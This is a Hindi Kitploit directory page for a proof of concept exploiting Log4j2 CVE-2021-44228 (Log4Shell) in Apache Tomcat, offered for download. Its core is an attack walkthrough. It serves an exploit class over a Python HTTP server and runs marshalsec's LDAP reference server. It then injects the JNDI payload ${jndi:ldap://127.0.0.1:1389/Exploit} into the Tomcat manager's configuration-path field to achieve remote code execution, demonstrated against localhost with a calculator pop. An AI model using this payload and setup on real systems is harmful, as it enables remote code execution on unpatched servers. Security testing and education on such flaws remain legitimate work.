Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
apache-tomcat-log4j — Apache Tomcat में Log4j2 CVE-2021-44228 भेद्यता POC | Kitploit
उपकरण/GitHubGitHub/many-fac3d-g0d/apache-tomcat-log4j
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmany-fac3d-g0d/apache-tomcat-log4j

apache-tomcat-log4j

Apache Tomcat में Log4j2 CVE-2021-44228 भेद्यता POC

रिपॉजिटरी देखें
54 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache Tomcat में Log4j2 CVE-2021-44228 भेद्यता POC

पूर्वावलोकन

GIF

सेटअप

टॉमकैट सर्वर प्रारंभ करें

root@kitploit:~
git clone
cd apache-tomcat-10.0.14/bin
startup.bat

एक्सप्लॉइट क्लास सर्व करें

root@kitploit:~
cd exploit
py -m http.server 8888
root@kitploit:~
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

हमला

इनपुट ${jndi:ldap://127.0.0.1:1389/Exploit} को 'XML Configuration file path' फ़ील्ड में, http://localhost:8080/manager/html मैनेजर ऐप के अंदर डालें

एक्सप्लॉइट क्लास लोड हो जाती है और RCE लोड हो जाता है (कैलकुलेटर ऐप खुल जाएगा)

अस्वीकरण

यह रिपॉज़िटरी केवल शैक्षिक उद्देश्य के लिए बनाया गया एक POC है। रिपॉज़िटरी स्वामी किसी भी हुए नुकसान के लिए ज़िम्मेदार नहीं है। एक नैतिक नोट के रूप में, बुराई मत करो।

संदर्भ

LDAP एक्सप्लॉइट https://github.com/mbechler/marshalsec

टूल डाउनलोड करें